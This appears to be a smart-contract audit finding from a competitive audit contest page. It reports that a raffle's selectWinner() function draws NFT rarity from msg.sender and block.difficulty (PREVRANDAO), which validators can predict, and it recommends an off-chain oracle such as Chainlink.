weak random rarity pick mechanism causes manipulated raffle result
Summary
The selection of the rarity in the raffle protocol is determined by the encoded values of msg.sender and block.difficulty within the selectWinner() function:
Vulnerability Details
Despite the use of the keccak256 hash mechanism, employing msg.sender and block.difficulty as sources of randomness can potentially introduce vulnerabilities, allowing for the manipulation and prediction of the rarity selection process.
Impact
Following implementation changes aimed at maintaining backward compatibility, the old block.difficulty opcode, initially responsible for providing the current block's Proof of Work difficulty, now returns the PREVRANDAO value. As PREVRANDAO is not genuinely random, contracts utilizing pseudo-random values are left vulnerable to attacks.
Validators with the responsibility of proposing new blocks can access the PREVRANDAO opcode's value, enabling them to calculate the pseudo-random value using the same logic applied in the smart contract. Consequently, this vulnerability opens the door for the manipulation of the NFT rarity, compromising the fairness and integrity of the raffle.
Tools Used
Manual code review
Recommendations
To enhance the security and reliability of the raffle protocol, it is strongly advised to implement off-chain mechanisms for generating random numbers, such as the integration of secure and decentralized oracles like Chainlink. Adopting such off-chain solutions would significantly mitigate the risks associated with predictable pseudo-random number generation, thereby safeguarding the protocol against potential manipulation and exploitation.
Lead Judging Commences
weak-randomness
Root cause: bad RNG Impact: manipulate winner
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.